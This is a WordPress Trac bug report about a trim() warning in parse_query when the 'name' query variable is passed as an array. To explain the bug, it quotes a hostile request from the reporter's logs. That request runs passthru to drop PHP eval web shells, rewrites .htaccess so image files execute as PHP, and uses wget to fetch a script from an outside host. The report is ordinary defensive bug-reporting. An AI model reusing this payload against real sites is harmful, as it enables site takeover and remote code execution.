[wp-trac] [WordPress Trac] #46797: parse_query: E_WARNING: trim() expects parameter 1 to be string, array given
WordPress Trac
noreply at wordpress.org
Thu Apr 4 13:20:29 UTC 2019
#46797: parse_query: E_WARNING: trim() expects parameter 1 to be string, array
given
--------------------------+-----------------------------
Reporter: conner_bw | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: Query | Version: 5.1
Severity: normal | Keywords:
Focuses: |
--------------------------+-----------------------------
We keep seeing E_WARNING: trim() expects parameter 1 to be string, array
given in our New Relic logs.
The problem is this line of code:
{{{
$qv['name'] = trim( $qv['name'] );
}}}
Source: https://github.com/WordPress/wordpress-
develop/blob/a0ca5afd8977b5a3857084d9cb1bd345166e2f21/src/wp-includes
/class-wp-query.php#L764
A (malicious) user sends a request that looks like:
{{{
> GET
/?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo
'Vuln!! patch it Now!' > vuln.htm; echo 'Vuln!!<?php @eval($_POST['pass'])
?>'> sites/default/files/vuln.php; echo 'Vuln!!<?php @eval($_POST['pass'])
?>'> vuln.php; cd sites/default/files/; echo 'AddType application/x-httpd-
php .jpg' > .htaccess; wget 'http://40k.waszmann.de/Deutsch/images/up.php'
}}}
Such a request makes `$qv['name']` an array, not a string.
Needs to be sanitized.
--
Ticket URL: <https://core.trac.wordpress.org/ticket/46797>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list